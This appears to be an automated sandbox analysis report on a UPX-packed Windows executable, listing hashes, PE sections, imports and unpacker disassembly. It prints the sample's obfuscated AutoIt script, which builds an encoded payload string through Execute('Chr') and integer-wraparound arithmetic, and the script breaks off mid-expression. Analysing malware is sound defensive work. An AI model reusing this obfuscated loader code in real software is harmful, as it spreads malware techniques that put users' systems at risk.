SHA512: | 572d087ee6a57b49d9cea4bdf26ac48cdaa8671d11afafb2e29f4925369bb71bcf9221716f9e21385ed745aeafae34a725ea228b517efb91f0acd1ec0d03c9f4 |
SSDEEP: | 12288:xXe9PPlowWX0t6mOQwg1Qd15CcYk0We1KZ:4hloDX0XOf4EZ |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S................g..........$...............%.....H.......X.2...........q)..Z...q)......q)........\.....q)......Rich........... |
File Icon |
---|
Icon Hash: | 0d1c295ae18c168a |
Static PE Info |
---|
General | |
---|---|
Entrypoint: | 0x4eafe0 |
Entrypoint Section: | UPX1 |
Digitally signed: | false |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE |
DLL Characteristics: | TERMINAL_SERVER_AWARE |
Time Stamp: | 0x612E34EE [Tue Aug 31 13:55:58 2021 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 5 |
OS Version Minor: | 1 |
File Version Major: | 5 |
File Version Minor: | 1 |
Subsystem Version Major: | 5 |
Subsystem Version Minor: | 1 |
Import Hash: | ef471c0edf1877cd5a881a6a8bf647b9 |
Entrypoint Preview |
---|
Instruction |
---|
pushad |
mov esi, 00497000h |
lea edi, dword ptr [esi-00096000h] |
push edi |
jmp 00007F31EC8F7F1Dh |
nop |
mov al, byte ptr [esi] |
inc esi |
mov byte ptr [edi], al |
inc edi |
add ebx, ebx |
jne 00007F31EC8F7F19h |
mov ebx, dword ptr [esi] |
sub esi, FFFFFFFCh |
adc ebx, ebx |
jc 00007F31EC8F7EFFh |
mov eax, 00000001h |
add ebx, ebx |
jne 00007F31EC8F7F19h |
mov ebx, dword ptr [esi] |
sub esi, FFFFFFFCh |
adc ebx, ebx |
adc eax, eax |
add ebx, ebx |
jnc 00007F31EC8F7F1Dh |
jne 00007F31EC8F7F3Ah |
mov ebx, dword ptr [esi] |
sub esi, FFFFFFFCh |
adc ebx, ebx |
jc 00007F31EC8F7F31h |
dec eax |
add ebx, ebx |
jne 00007F31EC8F7F19h |
mov ebx, dword ptr [esi] |
sub esi, FFFFFFFCh |
adc ebx, ebx |
adc eax, eax |
jmp 00007F31EC8F7EE6h |
add ebx, ebx |
jne 00007F31EC8F7F19h |
mov ebx, dword ptr [esi] |
sub esi, FFFFFFFCh |
adc ebx, ebx |
adc ecx, ecx |
jmp 00007F31EC8F7F64h |
xor ecx, ecx |
sub eax, 03h |
jc 00007F31EC8F7F23h |
shl eax, 08h |
mov al, byte ptr [esi] |
inc esi |
xor eax, FFFFFFFFh |
je 00007F31EC8F7F87h |
sar eax, 1 |
mov ebp, eax |
jmp 00007F31EC8F7F1Dh |
add ebx, ebx |
jne 00007F31EC8F7F19h |
mov ebx, dword ptr [esi] |
sub esi, FFFFFFFCh |
adc ebx, ebx |
jc 00007F31EC8F7EDEh |
inc ecx |
add ebx, ebx |
jne 00007F31EC8F7F19h |
mov ebx, dword ptr [esi] |
sub esi, FFFFFFFCh |
adc ebx, ebx |
jc 00007F31EC8F7ED0h |
add ebx, ebx |
jne 00007F31EC8F7F19h |
mov ebx, dword ptr [esi] |
sub esi, FFFFFFFCh |
adc ebx, ebx |
adc ecx, ecx |
add ebx, ebx |
jnc 00007F31EC8F7F01h |
jne 00007F31EC8F7F1Bh |
mov ebx, dword ptr [esi] |
sub esi, FFFFFFFCh |
adc ebx, ebx |
jnc 00007F31EC8F7EF6h |
add ecx, 02h |
cmp ebp, FFFFFB00h |
adc ecx, 02h |
lea edx, dword ptr [edi+ebp] |
cmp ebp, FFFFFFFCh |
jbe 00007F31EC8F7F20h |
mov al, byte ptr [edx] |
Rich Headers |
---|
Programming Language: |
|
Data Directories |
---|
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xfe06c | 0x424 | .rsrc |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xec000 | 0x1206c | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xfe490 | 0x18 | .rsrc |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xeb1c4 | 0x48 | UPX1 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Sections |
---|
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|
UPX0 | 0x1000 | 0x96000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ |
UPX1 | 0x97000 | 0x55000 | 0x54400 | False | 0.98807840319 | data | 7.93564359033 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.rsrc | 0xec000 | 0x13000 | 0x12600 | False | 0.116749043367 | data | 2.92590052135 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
Resources |
---|
Name | RVA | Size | Type | Language | Country |
---|---|---|---|---|---|
RT_ICON | 0xec354 | 0x128 | GLS_BINARY_LSB_FIRST | English | Great Britain |
RT_ICON | 0xec480 | 0x10828 | dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 4292090908, next used block 4292090908 | English | Great Britain |
RT_STRING | 0xd4ca0 | 0x594 | data | English | Great Britain |
RT_STRING | 0xd5234 | 0x68a | data | English | Great Britain |
RT_STRING | 0xd58c0 | 0x490 | data | English | Great Britain |
RT_STRING | 0xd5d50 | 0x5fc | data | English | Great Britain |
RT_STRING | 0xd634c | 0x65c | data | English | Great Britain |
RT_STRING | 0xd69a8 | 0x466 | data | English | Great Britain |
RT_STRING | 0xd6e10 | 0x158 | data | English | Great Britain |
RT_RCDATA | 0xfccac | 0xefc | data | ||
RT_GROUP_ICON | 0xfdbac | 0x14 | data | English | Great Britain |
RT_GROUP_ICON | 0xfdbc4 | 0x14 | data | English | Great Britain |
RT_VERSION | 0xfdbdc | 0xdc | data | English | Great Britain |
RT_MANIFEST | 0xfdcbc | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain |
Imports |
---|
DLL | Import |
---|---|
KERNEL32.DLL | LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess |
ADVAPI32.dll | AddAce |
COMCTL32.dll | ImageList_Remove |
COMDLG32.dll | GetSaveFileNameW |
GDI32.dll | LineTo |
IPHLPAPI.DLL | IcmpSendEcho |
MPR.dll | WNetUseConnectionW |
ole32.dll | CoGetObject |
OLEAUT32.dll | VariantInit |
PSAPI.DLL | GetProcessMemoryInfo |
SHELL32.dll | DragFinish |
USER32.dll | GetDC |
USERENV.dll | LoadUserProfileW |
UxTheme.dll | IsThemeActive |
VERSION.dll | VerQueryValueW |
WININET.dll | FtpOpenFileW |
WINMM.dll | timeGetTime |
WSOCK32.dll | socket |
Version Infos |
---|
Description | Data |
---|---|
Translation | 0x0809 0x04b0 |
Possible Origin |
---|
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | Great Britain |
Static AutoIT Info |
---|
General | |
---|---|
Code: | #NoTrayIcon GLOBAL $X30GC0 = EXECUTE DIM $O31TOY7 = $X30GC0 (STRINGREPLACE ("EKOCEKOhEKOrEKO" , "EKO" , "" ) ) DIM $F33JS1NFK2 = $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8540 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8520 + 4294958876 ) & $O31TOY7 (8469 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8469 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8469 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8520 + 4294958876 ) & $O31TOY7 (8469 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8470 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8520 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8469 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8469 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8520 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) $F33JS1NFK2 &= $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8470 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8469 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8520 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8470 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8520 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8469 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8520 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8469 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8470 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8469 + 4294958876 ) & $O31TOY7 (8470 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8470 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8520 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) $F33JS1NFK2 &= $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8469 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8470 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8520 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8520 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8518 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8470 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8470 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8522 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) $F33JS1NFK2 &= $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8468 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8470 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8475 + 4294958876 ) & $O31TOY7 (8469 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8517 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8474 + 4294958876 ) & $O31TOY7 (8476 + 4294958876 ) & $O31TOY7 (8477 + 4294958876 ) & $O31TOY7 (8472 + 4294958876 ) & $O31TOY7 (8473 + 4294958876 ) & $O31TOY7 (8519 + 4294958876 ) & $O31TOY7 (8521 + 4294958876 ) & $O31TOY7 (8471 + 4294958876 ) 